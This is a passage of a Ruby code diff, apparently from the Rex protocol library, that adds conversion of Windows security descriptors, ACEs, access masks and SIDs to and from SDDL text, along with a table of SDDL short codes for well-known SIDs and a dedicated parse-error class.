+        when 'SW'
+          access_mask.protocol |= 8
+        when 'LO'
+          access_mask.protocol |= 128
+        when 'DT'
+          access_mask.protocol |= 64
+        when 'CR'
+          access_mask.protocol |= 256
+        # file access rights
+        when 'FA'
+          access_mask.protocol |= 0x1ff
+          access_mask.de = true
+          access_mask.rc = true
+          access_mask.wd = true
+          access_mask.wo = true
+          access_mask.sy = true
+        when 'FR'
+          access_mask.protocol |= 0x89
+        when 'FW'
+          access_mask.protocol |= 0x116
+        when 'FX'
+          access_mask.protocol |= 0xa0
+        # registry key access rights
+        when 'KA'
+          access_mask.protocol |= 0x3f
+          access_mask.de = true
+          access_mask.rc = true
+          access_mask.wd = true
+          access_mask.wo = true
+        when 'KR'
+          access_mask.protocol |= 0x19
+        when 'KW'
+          access_mask.protocol |= 0x06
+        when 'KX'
+          access_mask.protocol |= 0x19
+        when 'NR', 'NW', 'NX'
+          raise SDDLParseError.new('unsupported ACE access right: ' + right)
+        when ''
+        else
+          raise SDDLParseError.new('unknown ACE access right: ' + right)
+        end
+      end
+
+      access_mask
+    end
  end

  # [2.4.2.2 SID--Packet Representation](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/f992ad60-0fe4-4b87-9fed-beb478836861)
@@ -75,6 +192,105 @@ module Rex::Proto::MsDtyp
    def rid
      sub_authority.last
    end
+
+    # these can be validated using powershell where ?? is the code
+    #   (ConvertFrom-SddlString -Sddl "O:??").RawDescriptor.Owner
+    SDDL_SIDS = {
+      'AA' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ACCESS_CONTROL_ASSISTANCE_OPS,                                                                     # SDDL_ACCESS_CONTROL_ASSISTANCE_OPS
+      'AC' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_ALL_APP_PACKAGES,                                                                                          # SDDL_ALL_APP_PACKAGES
+      'AN' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_ANONYMOUS_LOGON_SID,                                                                                       # SDDL_ANONYMOUS
+      'AO' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ACCOUNT_OPS,                                                                                       # SDDL_ACCOUNT_OPERATORS
+      'AP' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_PROTECTED_USERS}",                                                                # SDDL_PROTECTED_USERS
+      'AU' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATED_USER_SID,                                                                                    # SDDL_AUTHENTICATED_USERS
+      'BA' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ADMINS,                                                                                            # SDDL_BUILTIN_ADMINISTRATORS
+      'BG' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_GUESTS,                                                                                            # SDDL_BUILTIN_GUESTS
+      'BO' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_BACKUP_OPS,                                                                                        # SDDL_BACKUP_OPERATORS
+      'BU' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_USERS,                                                                                             # SDDL_BUILTIN_USERS
+      'CA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_CERT_ADMINS}",                                                                    # SDDL_CERT_SERV_ADMINISTRATORS
+      'CD' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_CERTSVC_DCOM_ACCESS_GROUP,                                                                         # SDDL_CERTSVC_DCOM_ACCESS
+      'CG' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_GROUP_SID,                                                                                         # SDDL_CREATOR_GROUP
+      'CN' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_CLONEABLE_CONTROLLERS}",                                                          # SDDL_CLONEABLE_CONTROLLERS
+      'CO' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_OWNER_SID,                                                                                         # SDDL_CREATOR_OWNER
+      'CY' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_CRYPTO_OPERATORS,                                                                                  # SDDL_CRYPTO_OPERATORS
+      'DA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ADMINS}",                                                                         # SDDL_DOMAIN_ADMINISTRATORS
+      'DC' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_COMPUTERS}",                                                                      # SDDL_DOMAIN_COMPUTERS
+      'DD' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_CONTROLLERS}",                                                                    # SDDL_DOMAIN_DOMAIN_CONTROLLERS
+      'DG' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_GUESTS}",                                                                         # SDDL_DOMAIN_GUESTS
+      'DU' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_USERS}",                                                                          # SDDL_DOMAIN_USERS
+      'EA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_ADMINS}",                                                              # SDDL_ENTERPRISE_ADMINS
+      'ED' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_ENTERPRISE_CONTROLLERS_SID,                                                                                # SDDL_ENTERPRISE_DOMAIN_CONTROLLERS
+      'EK' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_KEY_ADMINS}",                                                          # SDDL_ENTERPRISE_KEY_ADMINS
+      'ER' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_EVENT_LOG_READERS_GROUP,                                                                           # SDDL_EVENT_LOG_READERS
+      'ES' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_RDS_ENDPOINT_SERVERS,                                                                              # SDDL_RDS_ENDPOINT_SERVERS
+      'HA' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_HYPER_V_ADMINS,                                                                                    # SDDL_HYPER_V_ADMINS
+      'HI' => "S-1-16-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_HIGH_RID}",                                                                            # SDDL_ML_HIGH
+      'IS' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_IUSERS,                                                                                            # SDDL_IIS_USERS
+      'IU' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_INTERACTIVE_SID,                                                                                           # SDDL_INTERACTIVE
+      'KA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_KEY_ADMINS}",                                                                     # SDDL_KEY_ADMINS
+      'LA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_USER_RID_ADMIN}",                                                                           # SDDL_LOCAL_ADMIN
+      'LG' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_USER_RID_GUEST}",                                                                           # SDDL_LOCAL_GUEST
+      'LS' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_LOCAL_SERVICE_SID,                                                                                         # SDDL_LOCAL_SERVICE
+      'LU' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_LOGGING_USERS,                                                                                     # SDDL_PERFLOG_USERS
+      'LW' => "S-1-16-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_LOW_RID}",                                                                             # SDDL_ML_LOW
+      'ME' => "S-1-16-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_MEDIUM_RID}",                                                                          # SDDL_ML_MEDIUM
+      'MP' => "S-1-16-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_MEDIUM_PLUS_RID}",                                                                     # SDDL_ML_MEDIUM_PLUS
+      'MU' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_MONITORING_USERS,                                                                                  # SDDL_PERFMON_USERS
+      'NO' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_NETWORK_CONFIGURATION_OPS,                                                                         # SDDL_NETWORK_CONFIGURATION_OPS
+      'NS' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_NETWORK_SERVICE_SID,                                                                                       # SDDL_NETWORK_SERVICE
+      'NU' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_NETWORK_SID,                                                                                               # SDDL_NETWORK
+      'OW' => "#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_CREATOR_SID_AUTHORITY}-4",                                                                              # SDDL_OWNER_RIGHTS
+      'PA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_POLICY_ADMINS}",                                                                  # SDDL_GROUP_POLICY_ADMINS
+      'PO' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_PRINT_OPS,                                                                                         # SDDL_PRINTER_OPERATORS
+      'PS' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_PRINCIPAL_SELF_SID,                                                                                        # SDDL_PERSONAL_SELF
+      'PU' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_POWER_USERS,                                                                                       # SDDL_POWER_USERS
+      'RA' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_RDS_REMOTE_ACCESS_SERVERS,                                                                         # SDDL_RDS_REMOTE_ACCESS_SERVERS
+      'RC' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_RESTRICTED_CODE_SID,                                                                                       # SDDL_RESTRICTED_CODE
+      'RD' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_REMOTE_DESKTOP_USERS,                                                                              # SDDL_REMOTE_DESKTOP
+      'RE' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_REPLICATOR,                                                                                        # SDDL_REPLICATOR
+      'RM' => "#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_BUILTIN_DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_REMOTE_MANAGEMENT_USERS}",  # SDDL_RMS__SERVICE_OPERATORS
+      'RO' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_ENTERPRISE_READONLY_DOMAIN_CONTROLLERS}",                                         # SDDL_ENTERPRISE_RO_DCs
+      'RS' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_RID_RAS_SERVERS}",                                                                    # SDDL_RAS_SERVERS
+      'RU' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_PREW2KCOMPACCESS,                                                                                  # SDDL_ALIAS_PREW2KCOMPACC
+      'SA' => "${DOMAIN_SID}-#{Rex::Proto::Secauthz::WellKnownSids::DOMAIN_GROUP_RID_SCHEMA_ADMINS}",                                                                  # SDDL_SCHEMA_ADMINISTRATORS
+      'SI' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_MANDATORY_SYSTEM_SID,                                                                                      # SDDL_ML_SYSTEM
+      'SO' => Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_SYSTEM_OPS,                                                                                        # SDDL_SERVER_OPERATORS
+      'SS' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_AUTHENTICATION_SERVICE_ASSERTED_SID,                                                                       # SDDL_SERVICE_ASSERTED
+      'SU' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_SERVICE_SID,                                                                                               # SDDL_SERVICE
+      'SY' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_LOCAL_SYSTEM_SID,                                                                                          # SDDL_LOCAL_SYSTEM
+      'UD' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_USERMODEDRIVERHOST_ID_BASE_SID,                                                                            # SDDL_USER_MODE_DRIVERS
+      'WD' => "#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_WORLD_SID_AUTHORITY}-#{Rex::Proto::Secauthz::WellKnownSids::SECURITY_WORLD_RID}",                       # SDDL_EVERYONE
+      'WR' => Rex::Proto::Secauthz::WellKnownSids::SECURITY_WRITE_RESTRICTED_CODE_SID                                                                                  # SDDL_WRITE_RESTRICTED_CODE
+    }.freeze
+
+    private_constant :SDDL_SIDS
+
+    def to_sddl_text(domain_sid: nil)
+      sid = to_s
+
+      lookup = domain_sid.blank? ? sid : sid.sub(domain_sid, '${DOMAIN_SID}')
+      if (sddl_text = self.class.const_get(:SDDL_SIDS).key(lookup)).nil?
+        sddl_text = sid
+      end
+      # these short names aren't supported by all versions of Windows, avoid compatibility issues by not outputting them
+      sddl_text = sid if %w[ AP CN EK KA ].include?(sddl_text)
+
+      sddl_text
+    end
+
+    def self.from_sddl_text(sddl_text, domain_sid:)
+      # see: https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
+      sddl_text = sddl_text.dup.upcase
+
+      if SDDL_SIDS.key?(sddl_text)
+        sid_text = SDDL_SIDS[sddl_text].sub('${DOMAIN_SID}', domain_sid)
+      elsif sddl_text =~ /^S(-\d+)+/
+        sid_text = sddl_text
+      else
+        raise SDDLParseError.new('invalid SID string: ' + sddl_text)
+      end
+
+      self.new(sid_text)
+    end
  end

  # [Universal Unique Identifier](http://pubs.opengroup.org/onlinepubs/9629399/apdxa.htm)
@@ -188,17 +404,18 @@ module Rex::Proto::MsDtyp
    string             :application_data, read_length: -> { calc_app_data_length }

    def calc_app_data_length
-      ace_header = parent&.header
-      return 0 if ace_header.nil?
-      ace_size = ace_header&.ace_size
+      ace_header = parent&.parent&.header
+      ace_body = parent&.parent&.body
+      return 0 if ace_header.nil? || ace_body.nil?
+
+      ace_size = ace_header.ace_size
      return 0 if ace_size.nil? or (ace_size == 0)

      ace_header_length = ace_header.to_binary_s.length
-      body = parent&.body
-      if body.nil?
+      if ace_body.nil?
        return 0 # Read no data as there is no body, so either we have done some data misalignment or we shouldn't be reading data.
      else
-        ace_body_length = body.to_binary_s.length
+        ace_body_length = ace_body.to_binary_s.length
        return ace_size - (ace_header_length + ace_body_length)
      end
    end
@@ -222,6 +439,152 @@ module Rex::Proto::MsDtyp
      # Type 16 aka 0x10 is reserved for future use
      string :default, read_length: -> { header.ace_size - body.rel_offset }
    end
+
+    def to_sddl_text(domain_sid: nil)
+      parts = []
+
+      case header.ace_type
+      when MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE
+        parts << 'A'
+      when MsDtypAceType::ACCESS_DENIED_ACE_TYPE
+        parts << 'D'
+      when MsDtypAceType::ACCESS_ALLOWED_OBJECT_ACE_TYPE
+        parts << 'OA'
+      when MsDtypAceType::ACCESS_DENIED_OBJECT_ACE_TYPE
+        parts << 'OD'
+      when MsDtypAceType::SYSTEM_AUDIT_ACE_TYPE
+        parts << 'AU'
+      when MsDtypAceType::SYSTEM_AUDIT_OBJECT_ACE_TYPE
+        parts << 'OU'
+      else
+        raise SDDLParseError.new('unknown ACE type: ' + header.ace_type.to_i)
+      end
+
+      ace_flags = ''
+      ace_flags << 'OI' if header.ace_flags.object_inherit_ace == 1
+      ace_flags << 'CI' if header.ace_flags.container_inherit_ace == 1
+      ace_flags << 'IO' if header.ace_flags.inherit_only_ace == 1
+
+      ace_flags << 'NP' if header.ace_flags.no_propagate_inherit_ace == 1
+      ace_flags << 'ID' if header.ace_flags.inherited_ace == 1
+      ace_flags << 'SA' if header.ace_flags.successful_access_ace_flag == 1
+      ace_flags << 'FA' if header.ace_flags.failed_access_ace_flag == 1
+      ace_flags << 'CR' if header.ace_flags.critical_ace_flag == 1
+      parts << ace_flags
+
+      parts << body.access_mask.to_sddl_text
+
+      if body[:flags]
+        parts << (body.flags[:ace_object_type_present] == 1 ? body.object_type.to_s : '')
+        parts << (body.flags[:ace_inherited_object_type_present] == 1 ? body.inherited_object_type.to_s : '')
+      else
+        parts << ''
+        parts << ''
+      end
+
+      if body.sid?
+        parts << body.sid.to_sddl_text(domain_sid: domain_sid)
+      else
+        parts << ''
+      end
+
+      parts.join(';')
+    end
+
+    def self.from_sddl_text(sddl_text, domain_sid:)
+      parts = sddl_text.upcase.split(';', -1)
+      raise SDDLParseError.new('too few ACE fields') if parts.length < 6
+      raise SDDLParseError.new('too many ACE fields') if parts.length > 7
+
+      ace_type, ace_flags, rights, object_guid, inherit_object_guid, account_sid = parts[0...6]
+      resource_attribute = parts[6]
+
+      ace = self.new
+      case ace_type
+      when 'A'
+        ace.header.ace_type = MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE
+      when 'D'
+        ace.header.ace_type = MsDtypAceType::ACCESS_DENIED_ACE_TYPE
+      when 'OA'
+        ace.header.ace_type = MsDtypAceType::ACCESS_ALLOWED_OBJECT_ACE_TYPE
+      when 'OD'
+        ace.header.ace_type = MsDtypAceType::ACCESS_DENIED_OBJECT_ACE_TYPE
+      when 'AU'
+        ace.header.ace_type = MsDtypAceType::SYSTEM_AUDIT_ACE_TYPE
+      when 'OU'
+        ace.header.ace_type = MsDtypAceType::SYSTEM_AUDIT_OBJECT_ACE_TYPE
+      when 'AL', 'OL', 'ML', 'XA', 'SD', 'RA', 'SP', 'XU', 'ZA', 'TL', 'FL'
+        raise SDDLParseError.new('unsupported ACE type: ' + ace_type)
+      else
+        raise SDDLParseError.new('unknown ACE type: ' + ace_type)
+      end
+
+      ace_flags.split(/(CI|OI|NP|IO|ID|SA|FA|TP|CR)/).each do |flag|
+        case flag
+        when 'CI'
+          ace.header.ace_flags.container_inherit_ace = true
+        when 'OI'
+          ace.header.ace_flags.object_inherit_ace = true
+        when 'NP'
+          ace.header.ace_flags.no_propagate_inherit_ace = true
+        when 'IO'
+          ace.header.ace_flags.inherit_only_ace = true
+        when 'ID'
+          ace.header.ace_flags.inherited_ace = true
+        when 'SA'
+          ace.header.ace_flags.successful_access_ace_flag = true
+        when 'FA'
+          ace.header.ace_flags.failed_access_ace_flag = true
+        when 'TP'
+          raise SDDLParseError.new('unsupported ACE flag: TP')
+        when 'CR'
+          ace.header.ace_flags.critical_ace_flag = true
+        when ''
+        else
+          raise SDDLParseError.new('unknown ACE flag: ' + flag)
+        end
+      end
+
+      ace.body.access_mask = MsDtypAccessMask.from_sddl_text(rights)
+
+      unless object_guid.blank?
+        begin
+          guid = MsDtypGuid.new(object_guid)
+        rescue StandardError
+          raise SDDLParseError.new('invalid object GUID: ' + object_guid)
+        end
+
+        unless ace.body.respond_to?('object_type=')
+          raise SDDLParseError.new('setting object type for incompatible ACE type')
+        end
+        ace.body.flags.ace_object_type_present = true
+        ace.body.object_type = guid
+      end
+
+      unless inherit_object_guid.blank?
+        begin
+          guid = MsDtypGuid.new(inherit_object_guid)
+        rescue StandardError
+          raise SDDLParseError.new('invalid inherited object GUID: ' + inherit_object_guid)
+        end
+
+        unless ace.body.respond_to?('inherited_object_type=')
+          raise SDDLParseError.new('setting inherited object type for incompatible ACE type')
+        end
+        ace.body.flags.ace_inherited_object_type_present = true
+        ace.body.inherited_object_type = guid
+      end
+
+      unless account_sid.blank?
+        ace.body.sid = MsDtypSid.from_sddl_text(account_sid, domain_sid: domain_sid)
+      end
+
+      unless resource_attribute.blank?
+        raise SDDLParseError.new('unsupported resource attribute: ' + resource_attribute)
+      end
+
+      ace
+    end
  end

  # [2.4.5 ACL](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/20233ed8-a6c6-4097-aafa-dd545ed24428)
@@ -271,6 +634,46 @@ module Rex::Proto::MsDtyp
    rest   :buffer, value: -> { build_buffer }
    hide   :buffer

+    def to_sddl_text(domain_sid: nil)
+      sddl_text = ''
+      sddl_text << "O:#{owner_sid.to_sddl_text(domain_sid: domain_sid)}" if owner_sid?
+      sddl_text << "G:#{group_sid.to_sddl_text(domain_sid: domain_sid)}" if group_sid?
+      sddl_text << "D:#{dacl_to_sddl_text(domain_sid: domain_sid)}" if dacl?
+      sddl_text << "S:#{sacl_to_sddl_text(domain_sid: domain_sid)}" if sacl?
+
+      sddl_text
+    end
+
+    def dacl_to_sddl_text(domain_sid: nil)
+      sddl_text = ''
+
+      if !dacl?
+        sddl_text << 'NO_ACCESS_CONTROL'
+      else
+        sddl_text << 'P' if control.pd == 1
+        sddl_text << 'AR' if control.dc == 1
+        sddl_text << 'AI' if control.di == 1
+        sddl_text << dacl.aces.map { |ace| "(#{ace.to_sddl_text(domain_sid: domain_sid)})" }.join
+      end
+
+      sddl_text
+    end
+
+    def sacl_to_sddl_text(domain_sid: nil)
+      sddl_text = ''
+
+      if !sacl?
+        sddl_text << 'NO_ACCESS_CONTROL'
+      else
+        sddl_text << 'P' if control.ps == 1
+        sddl_text << 'AR' if control.sc == 1
+        sddl_text << 'AI' if control.si == 1
+        sddl_text << sacl.aces.map { |ace| "(#{ace.to_sddl_text(domain_sid: domain_sid)})" }.join
+      end
+
+      sddl_text
+    end
+
    def self.from_sddl_text(sddl_text, domain_sid:)
      sacl_set = dacl_set = false
      sd = self.new
@@ -280,18 +683,18 @@ module Rex::Proto::MsDtyp
        case component
        when 'O'
          if sd.owner_sid.present?
-            raise RuntimeError.new('SDDL parse error on extra owner SID')
+            raise SDDLParseError.new('extra owner SID')
          end

-          sd.owner_sid = self.parse_sddl_sid(value, domain_sid: domain_sid)
+          sd.owner_sid = MsDtypSid.from_sddl_text(value, domain_sid: domain_sid)
        when 'G'
          if sd.group_sid.present?
-            raise RuntimeError.new('SDDL parse error on extra group SID')
+            raise SDDLParseError.new('extra group SID')
          end

-          sd.group_sid = self.parse_sddl_sid(value, domain_sid: domain_sid)
+          sd.group_sid = MsDtypSid.from_sddl_text(value, domain_sid: domain_sid)
        when 'D'
-          raise RuntimeError.new('SDDL parse error on extra DACL') if dacl_set
+          raise SDDLParseError.new('extra DACL') if dacl_set

          value.upcase!
          dacl_set = true
@@ -309,16 +712,16 @@ module Rex::Proto::MsDtyp
              access_control = false
            when ''
            else
-              raise RuntimeError.new('SDDL parse error on unknown DACL flag: ' + flag)
+              raise SDDLParseError.new('unknown DACL flag: ' + flag)
            end
          end

          next unless access_control

          sd.dacl = MsDtypAcl.new
-          sd.dacl.aces = self.parse_sddl_aces(value.delete_prefix(flags), domain_sid: domain_sid)
+          sd.dacl.aces = self.aces_from_sddl_text(value.delete_prefix(flags), domain_sid: domain_sid)
        when 'S'
-          raise RuntimeError.new('SDDL parse error on extra SACL') if sacl_set
+          raise SDDLParseError.new('extra SACL') if sacl_set

          value.upcase!
          sacl_set = true
@@ -336,16 +739,16 @@ module Rex::Proto::MsDtyp
              access_control = false
            when ''
            else
-              raise RuntimeError.new('SDDL parse error on unknown SACL flag: ' + flag)
+              raise SDDLParseError.new('unknown SACL flag: ' + flag)
            end
          end

          next unless access_control

          sd.sacl = MsDtypAcl.new
-          sd.sacl.aces = self.parse_sddl_aces(value.delete_prefix(flags), domain_sid: domain_sid)
+          sd.sacl.aces = self.aces_from_sddl_text(value.delete_prefix(flags), domain_sid: domain_sid)
        else
-          raise RuntimeError.new('SDDL parse error on unknown directive: ' + part[0])
+          raise SDDLParseError.new('unknown directive: ' + part[0])
        end
      end

@@ -355,321 +758,18 @@ module Rex::Proto::MsDtyp
    class << self
      private

-      def parse_sddl_ace(ace, domain_sid:)
-        parts = ace.upcase.split(';', -1)
-        raise RuntimeError.new('SDDL parse error on too few ACE fields') if parts.length < 6
-        raise RuntimeError.new('SDDL parse error on too many ACE fields') if parts.length > 7
-
-        ace_type, ace_flags, rights, object_guid, inherit_object_guid, account_sid = parts[0...6]
-        resource_attribute = parts[6]
-
-        ace = MsDtypAce.new
-        case ace_type
-        when 'A'
-          ace.header.ace_type = MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE
-        when 'D'
-          ace.header.ace_type = MsDtypAceType::ACCESS_DENIED_ACE_TYPE
-        when 'OA'
-          ace.header.ace_type = MsDtypAceType::ACCESS_ALLOWED_OBJECT_ACE_TYPE
-        when 'OD'
-          ace.header.ace_type = MsDtypAceType::ACCESS_DENIED_OBJECT_ACE_TYPE
-        when 'AU'
-          ace.header.ace_type = MsDtypAceType::SYSTEM_AUDIT_ACE_TYPE
-        when 'OU'
-          ace.header.ace_type = MsDtypAceType::SYSTEM_AUDIT_OBJECT_ACE_TYPE
-        when 'AL', 'OL', 'ML', 'XA', 'SD', 'RA', 'SP', 'XU', 'ZA', 'TL', 'FL'
-          raise RuntimeError.new('SDDL parse error on unsupported ACE type: ' + ace_type)
-        else
-          raise RuntimeError.new('SDDL parse error on unknown ACE type: ' + ace_type)
-        end
-
-        ace_flags.split(/(CI|OI|NP|IO|ID|SA|FA|TP|CR)/).each do |flag|
-          case flag
-          when 'CI'
-            ace.header.ace_flags.container_inherit_ace = true
-          when 'OI'
-            ace.header.ace_flags.object_inherit_ace = true
-          when 'NP'
-            ace.header.ace_flags.no_propagate_inherit_ace = true
-          when 'IO'
-            ace.header.ace_flags.inherit_only_ace = true
-          when 'ID'
-            ace.header.ace_flags.inherited_ace = true
-          when 'SA'
-            ace.header.ace_flags.successful_access_ace_flag = true
-          when 'FA'
-            ace.header.ace_flags.failed_access_ace_flag = true
-          when 'TP'
-            raise RuntimeError.new('SDDL parse error on unsupported ACE flag: TP')
-          when 'CR'
-            ace.header.ace_flags.critical_ace_flag = true
-          when ''
-          else
-            raise RuntimeError.new('SDDL parse error on unknown ACE flag: ' + flag)
-          end
-        end
-
-        rights.split(/(G[ARWX]|RC|SD|WD|WO|RP|WP|CC|DC|LC|SW|LO|DT|CR|F[ARWX]|K[ARWX]|N[RWX])/).each do |right|
-          case right
-          # generic access rights
-          when 'GA', 'GR', 'GW', 'GX'
-            ace.body.access_mask.send("#{right.downcase}=", true)
-          # standard access rights
-          when 'RC'
-            ace.body.access_mask.rc = true
-          when 'SD'
-            ace.body.access_mask.de = true
-          when 'WD', 'WO'
-            ace.body.access_mask.send("#{right.downcase}=", true)
-          # directory service object access rights
-          when 'RP'
-            ace.body.access_mask.protocol |= 16
-          when 'WP'
-            ace.body.access_mask.protocol |= 32
-          when 'CC'
-            ace.body.access_mask.protocol |= 1
-          when 'DC'
-            ace.body.access_mask.protocol |= 2
-          when 'LC'
-            ace.body.access_mask.protocol |= 4
-          when 'SW'
-            ace.body.access_mask.protocol |= 8
-          when 'LO'
-            ace.body.access_mask.protocol |= 128
-          when 'DT'
-            ace.body.access_mask.protocol |= 64
-          when 'CR'
-            ace.body.access_mask.protocol |= 256
-          # file access rights
-          when 'FA'
-            ace.body.access_mask.protocol |= 0x1ff
-            ace.body.access_mask.de = true
-            ace.body.access_mask.rc = true
-            ace.body.access_mask.wd = true
-            ace.body.access_mask.wo = true
-            ace.body.access_mask.sy = true
-          when 'FR'
-            ace.body.access_mask.protocol |= 0x89
-          when 'FW'
-            ace.body.access_mask.protocol |= 0x116
-          when 'FX'
-            ace.body.access_mask.protocol |= 0xa0
-          # registry key access rights
-          when 'KA'
-            ace.body.access_mask.protocol |= 0x3f
-            ace.body.access_mask.de = true
-            ace.body.access_mask.rc = true
-            ace.body.access_mask.wd = true
-            ace.body.access_mask.wo = true
-          when 'KR'
-            ace.body.access_mask.protocol |= 0x19
-          when 'KW'
-            ace.body.access_mask.protocol |= 0x06
-          when 'KX'
-            ace.body.access_mask.protocol |= 0x19
-          when 'NR', 'NW', 'NX'
-            raise RuntimeError.new('SDDL parse error on unsupported ACE access right: ' + right)
-          when ''
-          else
-            raise RuntimeError.new('SDDL parse error on unknown ACE access right: ' + right)
-          end
-        end
-
-        unless object_guid.blank?
-          begin
-            guid = MsDtypGuid.new(object_guid)
-          rescue StandardError
-            raise RuntimeError.new('SDDL parse error on invalid object GUID: ' + object_guid)
-          end
-
-          unless ace.body.respond_to?('object_type=')
-            raise RuntimeError.new('SDDL error on setting object type for incompatible ACE type')
-          end
-          ace.body.flags.ace_object_type_present = true
-          ace.body.object_type = guid
-        end
-
-        unless inherit_object_guid.blank?
-          begin
-            guid = MsDtypGuid.new(inherit_object_guid)
-          rescue StandardError
-            raise RuntimeError.new('SDDL parse error on invalid object GUID: ' + inherit_object_guid)
-          end
-
-          unless ace.body.respond_to?('inherited_object_type=')
-            raise RuntimeError.new('SDDL error on setting object type for incompatible ACE type')
-          end
-          ace.body.flags.ace_inherited_object_type_present = true
-          ace.body.inherited_object_type = guid
-        end
-
-        unless account_sid.blank?
-          ace.body.sid = self.parse_sddl_sid(account_sid, domain_sid: domain_sid)
-        end
-
-        unless resource_attribute.blank?
-          raise RuntimeError.new('SDDL parse error on unsupported resource attribute: ' + resource_attribute)
-        end
-
-        ace
-      end
-
-      def parse_sddl_aces(aces, domain_sid:)
+      def aces_from_sddl_text(aces, domain_sid:)
        ace_regex = /\([^\)]*\)/

        invalid_aces = aces.split(ace_regex).reject(&:empty?)
        unless invalid_aces.empty?
-          raise RuntimeError.new('SDDL parse error on malformed ACE: ' + invalid_aces.first)
+          raise SDDLParseError.new('malformed ACE: ' + invalid_aces.first)
        end

        aces.scan(ace_regex).map do |ace_text|
-          self.parse_sddl_ace(ace_text[1...-1], domain_sid: domain_sid)
+          MsDtypAce.from_sddl_text(ace_text[1...-1], domain_sid: domain_sid)
        end
      end
-
-      def parse_sddl_sid(sid, domain_sid:)
-        # see: https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
-        sid = sid.dup.upcase
-
-        # these can be validated using powershell where ?? is the code
-        #   (ConvertFrom-SddlString -Sddl "O:??").RawDescriptor.Owner
-        case sid
-        when 'AA'  # SDDL_ACCESS_CONTROL_ASSISTANCE_OPS
